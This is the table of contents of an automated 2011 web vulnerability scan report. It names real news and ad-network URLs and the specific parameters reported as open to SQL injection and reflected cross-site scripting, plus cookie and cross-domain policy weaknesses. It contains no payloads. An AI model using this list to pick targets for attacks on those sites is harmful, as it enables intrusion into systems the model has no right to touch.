XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, 09072011-02

Report generated by XSS.CX at Wed Sep 07 14:14:10 GMT-06:00 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search


1. SQL injection

1.1. http://data.weatherzone.com.au/json/animator/ [df parameter]

1.2. http://tools.ntnews.com.au//admin/gallery_images/remote/2011/02/06/tn_165705.jpg [REST URL parameter 7]

1.3. http://tools.ntnews.com.au//admin/gallery_images/remote/2011/07/13/tn_197121.jpg [REST URL parameter 7]

1.4. http://tools.ntnews.com.au/photo-gallery/photo_galleries_js.php [category_id parameter]

1.5. http://tools.themercury.com.au/admin/gallery_images/remote/2011/09/06/345781.jpg [REST URL parameter 1]

1.6. http://tools.themercury.com.au/feeds/feed-with-lead.php [REST URL parameter 1]

1.7. http://tools.themercury.com.au/feeds/feed-with-lead.php [name of an arbitrarily supplied request parameter]

1.8. http://tools.themercury.com.au/yoursay/yoursay-single-extract.php [range parameter]

2. Cross-site scripting (reflected)

2.1. http://ad.agkn.com/iframe!t=1131! [clk1 parameter]

2.2. http://ad.agkn.com/iframe!t=1131! [mt_adid parameter]

2.3. http://ad.agkn.com/iframe!t=1131! [mt_id parameter]

2.4. http://ad.agkn.com/iframe!t=1131! [name of an arbitrarily supplied request parameter]

2.5. http://ad.agkn.com/iframe!t=1131! [name of an arbitrarily supplied request parameter]

2.6. http://ad.agkn.com/iframe!t=1131! [redirect parameter]

2.7. http://ad.turn.com/server/pixel.htm [fpid parameter]

2.8. http://ad.turn.com/server/pixel.htm [sp parameter]

2.9. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]

2.10. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]

2.11. http://adnxs.revsci.net/imp [Z parameter]

2.12. http://adnxs.revsci.net/imp [s parameter]

2.13. http://ads.adbrite.com/adserver/vdi/830697 [REST URL parameter 3]

2.14. http://ads.adbrite.com/adserver/vdi/830697 [r parameter]

2.15. http://adsfac.us/ag.asp [cc parameter]

2.16. http://api-public.addthis.com/url/shares.json [callback parameter]

2.17. http://b.scorecardresearch.com/beacon.js [c1 parameter]

2.18. http://b.scorecardresearch.com/beacon.js [c10 parameter]

2.19. http://b.scorecardresearch.com/beacon.js [c15 parameter]

2.20. http://b.scorecardresearch.com/beacon.js [c2 parameter]

2.21. http://b.scorecardresearch.com/beacon.js [c3 parameter]

2.22. http://b.scorecardresearch.com/beacon.js [c4 parameter]

2.23. http://b.scorecardresearch.com/beacon.js [c5 parameter]

2.24. http://b.scorecardresearch.com/beacon.js [c6 parameter]

2.25. http://data.weatherzone.com.au/json/animator/ [callback parameter]

2.26. http://feed.video.news.com.au/f/g5OqK/8MZ0EQEjgP7F/2120022090 [REST URL parameter 1]

2.27. http://feed.video.news.com.au/f/g5OqK/8MZ0EQEjgP7F/2120022090 [callback parameter]

2.28. http://feed.video.news.com.au/f/g5OqK/8MZ0EQEjgP7F/2120022090 [name of an arbitrarily supplied request parameter]

2.29. http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js [mpck parameter]

2.30. http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js [mpck parameter]

2.31. http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js [mpvc parameter]

2.32. http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js [mpvc parameter]

2.33. http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_728x90-2logos_9_6.js [mpck parameter]

2.34. http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_728x90-2logos_9_6.js [mpck parameter]

2.35. http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_728x90-2logos_9_6.js [mpvc parameter]

2.36. http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_728x90-2logos_9_6.js [mpvc parameter]

2.37. http://img.mediaplex.com/content/0/9608/119290/ph1-gps-findyourself-728x90.js [mpck parameter]

2.38. http://img.mediaplex.com/content/0/9608/119290/ph1-gps-findyourself-728x90.js [mpvc parameter]

2.39. http://img.mediaplex.com/content/0/9608/119290/ph2_misc_longterm_728x90.js [mpck parameter]

2.40. http://img.mediaplex.com/content/0/9608/119290/ph2_misc_longterm_728x90.js [mpvc parameter]

2.41. http://js.revsci.net/gateway/gw.js [csid parameter]

2.42. http://mozo-widgets.f2.com.au/images/sprite-widget-17.png [REST URL parameter 1]

2.43. http://mozo-widgets.f2.com.au/images/sprite-widget-17.png [REST URL parameter 2]

2.44. http://mozo-widgets.f2.com.au/images/sprite-widget-logos.png [REST URL parameter 1]

2.45. http://mozo-widgets.f2.com.au/images/sprite-widget-logos.png [REST URL parameter 2]

2.46. http://mozo-widgets.f2.com.au/widgets/multiwidget3/SMH/FM-BUSINESS [REST URL parameter 1]

2.47. http://mozo-widgets.f2.com.au/widgets/multiwidget3/SMH/FM-BUSINESS [REST URL parameter 2]

2.48. http://mozo-widgets.f2.com.au/widgets/multiwidget3/WAT/FM-NEWS [REST URL parameter 1]

2.49. http://mozo-widgets.f2.com.au/widgets/multiwidget3/WAT/FM-NEWS [REST URL parameter 2]

2.50. http://ndm.feeds.theplatform.com/ps/JSON/PortalService/2.1/getReleaseList [PID parameter]

2.51. http://ndm.feeds.theplatform.com/ps/JSON/PortalService/2.1/getReleaseList [callback parameter]

2.52. http://ndm.feeds.theplatform.com/ps/JSON/PortalService/2.1/getReleaseList [endIndex parameter]

2.53. http://ndm.feeds.theplatform.com/ps/JSON/PortalService/2.1/getReleaseList [query parameter]

2.54. http://ndm.feeds.theplatform.com/ps/JSON/PortalService/2.1/getReleaseList [startIndex parameter]

2.55. http://pixel.invitemedia.com/rubicon_sync [publisher_redirecturl parameter]

2.56. http://pluck.abc.net.au/ver1.0/daapi2.api [cb parameter]

2.57. http://pluck.abc.net.au/ver1.0/daapi2.api [jsonRequest parameter]

2.58. http://tools.ntnews.com.au/poll/poll.php [name of an arbitrarily supplied request parameter]

2.59. http://tools.themercury.com.au/feeds/feed-ticker.php [name of an arbitrarily supplied request parameter]

2.60. http://tools.themercury.com.au/feeds/feed-ticker.php [rss_name parameter]

2.61. http://tools.themercury.com.au/feeds/feed-with-lead.php [rss_name parameter]

2.62. http://tools.themercury.com.au/yoursay/yoursay-single-extract.php [range parameter]

2.63. http://tps30.doubleverify.com/visit.js [plc parameter]

2.64. http://tps30.doubleverify.com/visit.js [sid parameter]

2.65. http://web.adblade.com/imps.php [description_color parameter]

2.66. http://web.adblade.com/imps.php [name of an arbitrarily supplied request parameter]

2.67. http://web.adblade.com/imps.php [title_color parameter]

2.68. http://web.adblade.com/imps.php [tpUrl parameter]

2.69. http://webservice.theweather.com.au/ws1/wx.php [fc parameter]

2.70. http://www.7perth.com.au/javascript.js [a parameter]

2.71. http://www.7perth.com.au/view/2/ [name of an arbitrarily supplied request parameter]

2.72. http://www.7perth.com.au/view/about/ [name of an arbitrarily supplied request parameter]

2.73. http://www.7perth.com.au/view/seven-news/ [name of an arbitrarily supplied request parameter]

2.74. http://www.abc.net.au/perth/news/ [name of an arbitrarily supplied request parameter]

2.75. http://www.linkedin.com/countserv/count/share [url parameter]

2.76. http://adnxs.revsci.net/imp [Referer HTTP header]

2.77. http://feeds.mycareer.com.au/crossdomain.xml [REST URL parameter 1]

2.78. http://feeds.mycareer.com.au/jobresults [REST URL parameter 1]

2.79. http://optimized-by.rubiconproject.com/a/7725/12338/21770-15.js [ruid cookie]

2.80. http://optimized-by.rubiconproject.com/a/7725/12338/21770-2.js [ruid cookie]

2.81. http://optimized-by.rubiconproject.com/a/7725/12338/22678-15.js [ruid cookie]

2.82. http://optimized-by.rubiconproject.com/a/7725/12338/22678-2.js [ruid cookie]

2.83. http://optimized-by.rubiconproject.com/a/7725/12338/22682-15.js [ruid cookie]

2.84. http://optimized-by.rubiconproject.com/a/7725/12338/22682-2.js [ruid cookie]

2.85. http://optimized-by.rubiconproject.com/a/7856/12590/22782-15.html [ruid cookie]

2.86. http://optimized-by.rubiconproject.com/a/7856/12590/22782-15.js [ruid cookie]

2.87. http://optimized-by.rubiconproject.com/a/7856/12590/22782-2.html [ruid cookie]

2.88. http://optimized-by.rubiconproject.com/a/7856/12590/22893-15.html [ruid cookie]

2.89. http://optimized-by.rubiconproject.com/a/7856/12590/22893-2.html [ruid cookie]

2.90. http://optimized-by.rubiconproject.com/a/dk.js [ruid cookie]

2.91. http://optimized-by.rubiconproject.com/a/dk.js [ruid cookie]

3. Flash cross-domain policy

3.1. http://ad.agkn.com/crossdomain.xml

3.2. http://ad.turn.com/crossdomain.xml

3.3. http://adfarm.mediaplex.com/crossdomain.xml

3.4. http://adsfac.us/crossdomain.xml

3.5. http://b.scorecardresearch.com/crossdomain.xml

3.6. http://bh.contextweb.com/crossdomain.xml

3.7. http://bid.rb.ntc.ace.advertising.com/crossdomain.xml

3.8. http://bs.serving-sys.com/crossdomain.xml

3.9. http://cdn.turn.com/crossdomain.xml

3.10. http://cdn4.eyewonder.com/crossdomain.xml

3.11. http://content.yieldmanager.edgesuite.net/crossdomain.xml

3.12. http://d3.zedo.com/crossdomain.xml

3.13. http://d7.zedo.com/crossdomain.xml

3.14. http://e.yimg.com/crossdomain.xml

3.15. http://edge.aperture.displaymarketplace.com/crossdomain.xml

3.16. http://espn-media.unitedfuture.com.s3.amazonaws.com/crossdomain.xml

3.17. http://external.ak.fbcdn.net/crossdomain.xml

3.18. http://feed.video.news.com.au/crossdomain.xml

3.19. http://feeds.news.com.au/crossdomain.xml

3.20. http://g-pixel.invitemedia.com/crossdomain.xml

3.21. http://g.ca.bid.invitemedia.com/crossdomain.xml

3.22. http://hpi.rotator.hadj7.adjuggler.net/crossdomain.xml

3.23. http://i.w55c.net/crossdomain.xml

3.24. http://ib.adnxs.com/crossdomain.xml

3.25. http://img-cdn.mediaplex.com/crossdomain.xml

3.26. http://img.mediaplex.com/crossdomain.xml

3.27. http://js.revsci.net/crossdomain.xml

3.28. http://l.yimg.com/crossdomain.xml

3.29. http://m.xp1.ru4.com/crossdomain.xml

3.30. http://map.media6degrees.com/crossdomain.xml

3.31. http://ndm.feeds.theplatform.com/crossdomain.xml

3.32. http://pix04.revsci.net/crossdomain.xml

3.33. http://pixel.invitemedia.com/crossdomain.xml

3.34. http://pixel.quantserve.com/crossdomain.xml

3.35. http://pt200194.unica.com/crossdomain.xml

3.36. http://s0.2mdn.net/crossdomain.xml

3.37. http://s1.2mdn.net/crossdomain.xml

3.38. http://secure-au.imrworldwide.com/crossdomain.xml

3.39. http://statse.webtrendslive.com/crossdomain.xml

3.40. http://sync.mathtag.com/crossdomain.xml

3.41. http://tags.bluekai.com/crossdomain.xml

3.42. http://www.7perth.com.au/crossdomain.xml

3.43. http://www.abc.net.au/crossdomain.xml

3.44. http://www.weatherchannel.com.au/crossdomain.xml

3.45. http://yql.yahooapis.com/crossdomain.xml

3.46. http://adadvisor.net/crossdomain.xml

3.47. http://ads.adbrite.com/crossdomain.xml

3.48. http://api.tweetmeme.com/crossdomain.xml

3.49. http://au.adserver.yahoo.com/crossdomain.xml

3.50. http://au.news.yahoo.com/crossdomain.xml

3.51. http://au.pfinance.yahoo.com/crossdomain.xml

3.52. http://cm.au.thewest.overture.com/crossdomain.xml

3.53. http://cookex.amp.yahoo.com/crossdomain.xml

3.54. http://courses.mycareer.com.au/crossdomain.xml

3.55. http://feeds.mycareer.com.au/crossdomain.xml

3.56. http://media.perthnow.com.au/crossdomain.xml

3.57. http://optimized-by.rubiconproject.com/crossdomain.xml

3.58. http://pagead2.googlesyndication.com/crossdomain.xml

3.59. http://pluck.abc.net.au/crossdomain.xml

3.60. http://resources.news.com.au/crossdomain.xml

3.61. http://static.ak.fbcdn.net/crossdomain.xml

3.62. http://traktr.news.com.au/crossdomain.xml

3.63. http://webservice.theweather.com.au/crossdomain.xml

3.64. http://www.facebook.com/crossdomain.xml

3.65. http://www.smh.com.au/crossdomain.xml

3.66. http://www.watoday.com.au/crossdomain.xml

3.67. http://www.wtp101.com/crossdomain.xml

3.68. http://api.twitter.com/crossdomain.xml

3.69. http://matcher-rbc.bidder7.mookie1.com/crossdomain.xml

4. Silverlight cross-domain policy

4.1. http://b.scorecardresearch.com/clientaccesspolicy.xml

4.2. http://feed.video.news.com.au/clientaccesspolicy.xml

4.3. http://pixel.quantserve.com/clientaccesspolicy.xml

4.4. http://s0.2mdn.net/clientaccesspolicy.xml

4.5. http://s1.2mdn.net/clientaccesspolicy.xml

4.6. http://secure-au.imrworldwide.com/clientaccesspolicy.xml

5. Cleartext submission of password

5.1. http://www.abc.net.au/res/libraries/pluck/abc.pluck-1.latest.min.js

5.2. http://www.watoday.com.au/wa-news/thousands-of-wa-households-went-cold-and-hungry-abs-20110906-1jvz4.html

6. Session token in URL

7. Password field submitted using GET method

8. Cookie scoped to parent domain

8.1. http://api.twitter.com/1/statuses/user_timeline.json

8.2. http://a.triggit.com/pxrucm

8.3. http://ad.agkn.com/iframe!t=1131!

8.4. http://b.scorecardresearch.com/b

8.5. http://bh.contextweb.com/bh/rtset

8.6. http://bid.rb.ntc.ace.advertising.com/site=0000799975/size=728090/u=2/bnum=54069056/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/tags=1/rubcpmprice=6F4E7BBBFD8CE677/istr=OTYwNDg0Ojc4OjA6MC4wMDA1ODQ2ODowLjAwMDU4NDY4OjAuMDAwNTg0Njg6MC4wMDA1NzMxODoxOjE6MC4wMDA1ODQ2ODowLjk3ODY0ODowLjAwMDUxMjg2NDY6MC4wMDA1ODkyODMzOjEzMTU0MDQwNjE6NTozOjEuMDIxMzUyOjAuMDAwNTEyODY0Ng/srcreq=8/bidtid=ASf536a25b934d4dbabaaf671365070601/guidm=1007:n4tx19dbice3prpg7887b1ymgzfc6iit/dref=http%253A%252F%252Fweather.news.com.au%252Fwa%252Fperth%252Fperth

8.7. http://bid.rb.ntc.ace.advertising.com/site=0000799975/size=728090/u=2/bnum=68910242/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=2/f=2/r=1/optn=1/fv=10/aolexp=0/tags=1/rubcpmprice=01F5D655E2FFC4EB/istr=OTYwNDg0Ojc4OjA6MC4wMDA1ODQ2ODowLjAwMDU4NDY4OjAuMDAwNTg0Njg6MC4wMDA1NzMxODoxOjE6MC4wMDA1ODQ2ODowLjk3ODY0ODowLjAwMDUxMjg2NDY6MC4wMDA1ODkyODMzOjEzMTU0MDQwNjE6NTozOjEuMDIxMzUyOjAuMDAwNTEyODY0Ng/srcreq=8/bidtid=AS072e9051ae61480d8af8a5a920c43596/guidm=1007:n4tx19dbice3prpg7887b1ymgzfc6iit/dref=http%253A%252F%252Fweather.news.com.au%252Fwa%252Fperth%252Fperth

8.8. http://bid.rb.ntc.ace.advertising.com/site=0000799975/size=728090/u=2/bnum=70524729/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=3/f=2/r=1/optn=1/fv=10/aolexp=0/tags=1/rubcpmprice=01F5D655E2FFC4EB/istr=OTYwNDg0Ojc4OjA6MC4wMDA1ODQ2ODowLjAwMDU4NDY4OjAuMDAwNTg0Njg6MC4wMDA1NzMxODoxOjE6MC4wMDA1ODQ2ODowLjk3ODY0ODowLjAwMDUxMjg2NDY6MC4wMDA1ODkyODMzOjEzMTU0MDQwNjE6NTozOjEuMDIxMzUyOjAuMDAwNTEyODY0Ng/srcreq=8/bidtid=AS2463e9943a804387a72e0e9f481b7178/guidm=1007:n4tx19dbice3prpg7887b1ymgzfc6iit/dref=http%253A%252F%252Fwww.perthnow.com.au%252F

8.9. http://cm.au.thewest.overture.com/js_flat_1_0/

8.10. http://d7.zedo.com/bar/v16-504/d3/jsc/gl.js

8.11. http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/130511/0/vj

8.12. http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/80617/0/vj

8.13. http://i.w55c.net/a.gif

8.14. http://i.w55c.net/m.gif

8.15. http://i.w55c.net/m_yahoo.gif

8.16. http://i.w55c.net/ping_match.gif

8.17. http://id.google.com/verify/EAAAAJ5qotIJ8Qa1PsQzLO_KCTk.gif

8.18. http://image2.pubmatic.com/AdServer/Pug

8.19. http://optimized-by.rubiconproject.com/a/7725/12338/21770-15.js

8.20. http://optimized-by.rubiconproject.com/a/7725/12338/21770-15.js

8.21. http://optimized-by.rubiconproject.com/a/7725/12338/21770-2.js

8.22. http://optimized-by.rubiconproject.com/a/7725/12338/21770-2.js

8.23. http://optimized-by.rubiconproject.com/a/7725/12338/22678-15.js

8.24. http://optimized-by.rubiconproject.com/a/7725/12338/22678-2.js

8.25. http://optimized-by.rubiconproject.com/a/7725/12338/22682-15.js

8.26. http://optimized-by.rubiconproject.com/a/7725/12338/22682-2.js

8.27. http://optimized-by.rubiconproject.com/a/7856/12590/22782-15.html

8.28. http://optimized-by.rubiconproject.com/a/7856/12590/22782-15.js

8.29. http://optimized-by.rubiconproject.com/a/7856/12590/22782-2.html

8.30. http://optimized-by.rubiconproject.com/a/7856/12590/22893-15.html

8.31. http://optimized-by.rubiconproject.com/a/7856/12590/22893-15.html

8.32. http://optimized-by.rubiconproject.com/a/7856/12590/22893-2.html

8.33. http://optimized-by.rubiconproject.com/a/dk.js

8.34. http://optimized-by.rubiconproject.com/a/dk.js

8.35. http://pixel.rubiconproject.com/tap.php

8.36. http://pixel.rubiconproject.com/tap.php

8.37. http://pixel.rubiconproject.com/tap.php

8.38. http://pixel.rubiconproject.com/tap.php

8.39. http://pixel.rubiconproject.com/tap.php

8.40. http://pixel.rubiconproject.com/tap.php

8.41. http://pixel.rubiconproject.com/tap.php

8.42. http://pixel.rubiconproject.com/tap.php

8.43. http://pixel.rubiconproject.com/tap.php

8.44. http://pixel.rubiconproject.com/tap.php

8.45. http://pixel.rubiconproject.com/tap.php

8.46. http://pluck.abc.net.au/ver1.0/daapi2.api

8.47. http://r1-ads.ace.advertising.com/site=782303/size=728090/u=2/bnum=36271028/hr=14/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.perthnow.com.au%252Fbusiness%252Fbusiness-old%252Ffraud-blackmail-in-latest-oswal-claims%252Fstory-e6frg2qu-1226131700884

8.48. http://r1-ads.ace.advertising.com/site=782303/size=728090/u=2/bnum=36912405/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.ntnews.com.au%252F

8.49. http://r1-ads.ace.advertising.com/site=782303/size=728090/u=2/bnum=5306309/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=2/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.ntnews.com.au%252F

8.50. http://r1-ads.ace.advertising.com/site=799695/size=300250/u=2/bnum=27560796/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=

8.51. http://r1-ads.ace.advertising.com/site=799696/size=728090/u=2/bnum=35855233/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.watoday.com.au%252F

8.52. http://r1-ads.ace.advertising.com/site=799696/size=728090/u=2/bnum=85535532/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fnews.smh.com.au%252Fbreaking-news-national%252Fwa-labor-launches-another-bushfire-probe-20110907-1jx2h.html

8.53. http://r1-ads.ace.advertising.com/site=801645/size=728090/u=2/bnum=18256183/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.perthnow.com.au%252F

8.54. http://r1-ads.ace.advertising.com/site=801647/size=300250/u=2/bnum=35058392/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=2/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.perthnow.com.au%252F

8.55. http://rc.d.chango.com/m/rc

8.56. http://rp.gwallet.com/r1/ruum

8.57. http://tap.rubiconproject.com/oz/feeds/invite-media-rtb/tokens/

8.58. http://tap.rubiconproject.com/oz/feeds/targus/profile

8.59. http://user.lucidmedia.com/clicksense/user

8.60. http://www.abc.net.au/includes/scripts/global.js

8.61. http://www.abc.net.au/local/global_css/common_modules/house_ads_m12.css

8.62. http://www.abc.net.au/local/global_css/common_modules/latest_media_m21.css

8.63. http://www.abc.net.au/local/global_css/common_modules/m60_login.css

8.64. http://www.abc.net.au/local/global_css/common_modules/river_of_content_m20.css

8.65. http://www.abc.net.au/local/global_css/common_modules/site_search_m3.css

8.66. http://www.abc.net.au/local/global_css/common_modules/top_stories_m14.css

8.67. http://www.abc.net.au/local/global_css/news/styles.css

8.68. http://www.abc.net.au/local/global_css/palettes/generic.css

8.69. http://www.abc.net.au/local/global_css/palettes/paletteA.css

8.70. http://www.abc.net.au/local/global_css/styles.css

8.71. http://www.abc.net.au/local/global_css/template/styles.css

8.72. http://www.abc.net.au/local/global_css/yaml/central_draft.css

8.73. http://www.abc.net.au/local/global_css/yaml/core/slim_base.css

8.74. http://www.abc.net.au/local/global_scripts/contribute/functions.js

8.75. http://www.abc.net.au/local/global_scripts/general.min.js

8.76. http://www.abc.net.au/local/includes/scripts/city_include.js

8.77. http://www.abc.net.au/local/includes/scripts/jquery/plugins/jquery.tools.min.js

8.78. http://www.abc.net.au/local/includes/scripts/tabs_latest_media.js

8.79. http://www.abc.net.au/res/abc/styles/screen.css

8.80. http://www.abc.net.au/res/libraries/abcjs/abc.js

8.81. http://www.abc.net.au/res/libraries/jquery/jquery-latest.min.js

8.82. http://www.abc.net.au/res/libraries/pluck/abc.pluck-1.latest.min.js

8.83. http://www.wtp101.com/pull_sync

9. Cookie without HttpOnly flag set

9.1. http://www.6pr.com.au/

9.2. http://a.triggit.com/pxrucm

9.3. http://ad.agkn.com/iframe!t=1131!

9.4. http://ad.yabuka.com/statsin/adframe/693/300x250

9.5. http://ad.yieldmanager.com/iframe3

9.6. http://ad.yieldmanager.com/iframe3

9.7. http://ad.yieldmanager.com/imp

9.8. http://ad.yieldmanager.com/imp

9.9. http://adsfac.us/ag.asp

9.10. http://api.twitter.com/1/statuses/user_timeline.json

9.11. http://au.news.yahoo.com/thewest/a/-/wa/10210782/wildcats-abandon-bogut-for-nevill/

9.12. http://au.news.yahoo.com/thewest/business/

9.13. http://b.scorecardresearch.com/b

9.14. http://bh.contextweb.com/bh/rtset

9.15. http://bid.rb.ntc.ace.advertising.com/site=0000799975/size=728090/u=2/bnum=54069056/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/tags=1/rubcpmprice=6F4E7BBBFD8CE677/istr=OTYwNDg0Ojc4OjA6MC4wMDA1ODQ2ODowLjAwMDU4NDY4OjAuMDAwNTg0Njg6MC4wMDA1NzMxODoxOjE6MC4wMDA1ODQ2ODowLjk3ODY0ODowLjAwMDUxMjg2NDY6MC4wMDA1ODkyODMzOjEzMTU0MDQwNjE6NTozOjEuMDIxMzUyOjAuMDAwNTEyODY0Ng/srcreq=8/bidtid=ASf536a25b934d4dbabaaf671365070601/guidm=1007:n4tx19dbice3prpg7887b1ymgzfc6iit/dref=http%253A%252F%252Fweather.news.com.au%252Fwa%252Fperth%252Fperth

9.16. http://bid.rb.ntc.ace.advertising.com/site=0000799975/size=728090/u=2/bnum=68910242/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=2/f=2/r=1/optn=1/fv=10/aolexp=0/tags=1/rubcpmprice=01F5D655E2FFC4EB/istr=OTYwNDg0Ojc4OjA6MC4wMDA1ODQ2ODowLjAwMDU4NDY4OjAuMDAwNTg0Njg6MC4wMDA1NzMxODoxOjE6MC4wMDA1ODQ2ODowLjk3ODY0ODowLjAwMDUxMjg2NDY6MC4wMDA1ODkyODMzOjEzMTU0MDQwNjE6NTozOjEuMDIxMzUyOjAuMDAwNTEyODY0Ng/srcreq=8/bidtid=AS072e9051ae61480d8af8a5a920c43596/guidm=1007:n4tx19dbice3prpg7887b1ymgzfc6iit/dref=http%253A%252F%252Fweather.news.com.au%252Fwa%252Fperth%252Fperth

9.17. http://bid.rb.ntc.ace.advertising.com/site=0000799975/size=728090/u=2/bnum=70524729/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=3/f=2/r=1/optn=1/fv=10/aolexp=0/tags=1/rubcpmprice=01F5D655E2FFC4EB/istr=OTYwNDg0Ojc4OjA6MC4wMDA1ODQ2ODowLjAwMDU4NDY4OjAuMDAwNTg0Njg6MC4wMDA1NzMxODoxOjE6MC4wMDA1ODQ2ODowLjk3ODY0ODowLjAwMDUxMjg2NDY6MC4wMDA1ODkyODMzOjEzMTU0MDQwNjE6NTozOjEuMDIxMzUyOjAuMDAwNTEyODY0Ng/srcreq=8/bidtid=AS2463e9943a804387a72e0e9f481b7178/guidm=1007:n4tx19dbice3prpg7887b1ymgzfc6iit/dref=http%253A%252F%252Fwww.perthnow.com.au%252F

9.18. http://cm.au.thewest.overture.com/js_flat_1_0/

9.19. http://d7.zedo.com/bar/v16-504/d3/jsc/gl.js

9.20. http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/130511/0/vj

9.21. http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/80617/0/vj

9.22. http://i.w55c.net/a.gif

9.23. http://i.w55c.net/m.gif

9.24. http://i.w55c.net/m_yahoo.gif

9.25. http://i.w55c.net/ping_match.gif

9.26. http://image2.pubmatic.com/AdServer/Pug

9.27. http://optimized-by.rubiconproject.com/a/7725/12338/21770-15.js

9.28. http://optimized-by.rubiconproject.com/a/7725/12338/21770-15.js

9.29. http://optimized-by.rubiconproject.com/a/7725/12338/21770-2.js

9.30. http://optimized-by.rubiconproject.com/a/7725/12338/21770-2.js

9.31. http://optimized-by.rubiconproject.com/a/7725/12338/22678-15.js

9.32. http://optimized-by.rubiconproject.com/a/7725/12338/22678-2.js

9.33. http://optimized-by.rubiconproject.com/a/7725/12338/22682-15.js

9.34. http://optimized-by.rubiconproject.com/a/7725/12338/22682-2.js

9.35. http://optimized-by.rubiconproject.com/a/7856/12590/22782-15.html

9.36. http://optimized-by.rubiconproject.com/a/7856/12590/22782-15.js

9.37. http://optimized-by.rubiconproject.com/a/7856/12590/22782-2.html

9.38. http://optimized-by.rubiconproject.com/a/7856/12590/22893-15.html

9.39. http://optimized-by.rubiconproject.com/a/7856/12590/22893-15.html

9.40. http://optimized-by.rubiconproject.com/a/7856/12590/22893-2.html

9.41. http://optimized-by.rubiconproject.com/a/dk.js

9.42. http://optimized-by.rubiconproject.com/a/dk.js

9.43. http://pixel.rubiconproject.com/tap.php

9.44. http://pixel.rubiconproject.com/tap.php

9.45. http://pixel.rubiconproject.com/tap.php

9.46. http://pixel.rubiconproject.com/tap.php

9.47. http://pixel.rubiconproject.com/tap.php

9.48. http://pixel.rubiconproject.com/tap.php

9.49. http://pixel.rubiconproject.com/tap.php

9.50. http://pixel.rubiconproject.com/tap.php

9.51. http://pixel.rubiconproject.com/tap.php

9.52. http://pixel.rubiconproject.com/tap.php

9.53. http://pixel.rubiconproject.com/tap.php

9.54. http://pluck.abc.net.au/ver1.0/daapi2.api

9.55. http://r1-ads.ace.advertising.com/site=782303/size=728090/u=2/bnum=36271028/hr=14/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.perthnow.com.au%252Fbusiness%252Fbusiness-old%252Ffraud-blackmail-in-latest-oswal-claims%252Fstory-e6frg2qu-1226131700884

9.56. http://r1-ads.ace.advertising.com/site=782303/size=728090/u=2/bnum=36912405/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.ntnews.com.au%252F

9.57. http://r1-ads.ace.advertising.com/site=782303/size=728090/u=2/bnum=5306309/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=2/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.ntnews.com.au%252F

9.58. http://r1-ads.ace.advertising.com/site=799695/size=300250/u=2/bnum=27560796/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=

9.59. http://r1-ads.ace.advertising.com/site=799696/size=728090/u=2/bnum=35855233/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.watoday.com.au%252F

9.60. http://r1-ads.ace.advertising.com/site=799696/size=728090/u=2/bnum=85535532/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fnews.smh.com.au%252Fbreaking-news-national%252Fwa-labor-launches-another-bushfire-probe-20110907-1jx2h.html

9.61. http://r1-ads.ace.advertising.com/site=801645/size=728090/u=2/bnum=18256183/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.perthnow.com.au%252F

